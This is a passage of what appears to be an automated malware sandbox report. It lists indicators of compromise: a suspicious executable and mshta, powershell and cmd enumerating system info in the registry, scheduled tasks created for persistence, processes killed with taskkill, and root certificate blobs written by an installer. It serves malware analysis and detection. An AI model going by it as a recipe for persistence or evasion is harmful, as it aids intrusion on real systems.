\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString LzmwAqmV.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 powershell.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2096 schtasks.exe 1440 schtasks.exe 2336 schtasks.exe 7784 schtasks.exe 7300 schtasks.exe 5900 schtasks.exe 5000 schtasks.exe 3352 schtasks.exe 7680 schtasks.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
cmd.exeWerFault.exeWerFault.exeWerFault.exemshta.exeWerFault.exeLzmwAqmV.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS LzmwAqmV.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU LzmwAqmV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5976 taskkill.exe 1656 taskkill.exe 4220 taskkill.exe 4452 taskkill.exe 8036 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
Processes:
sihclient.exesvchost.exemsiexec.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe -
Modifies registry class 9 IoCs
Processes:
VC_redist.x86.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents\{a8968509-65be-4c09-a460-fd1584b1cdbf} VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents VC_redist.x86.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\ = "{a8968509-65be-4c09-a460-fd1584b1cdbf}" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\DisplayName = "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30040" VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Version = "14.29.30040.0" VC_redist.x86.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created 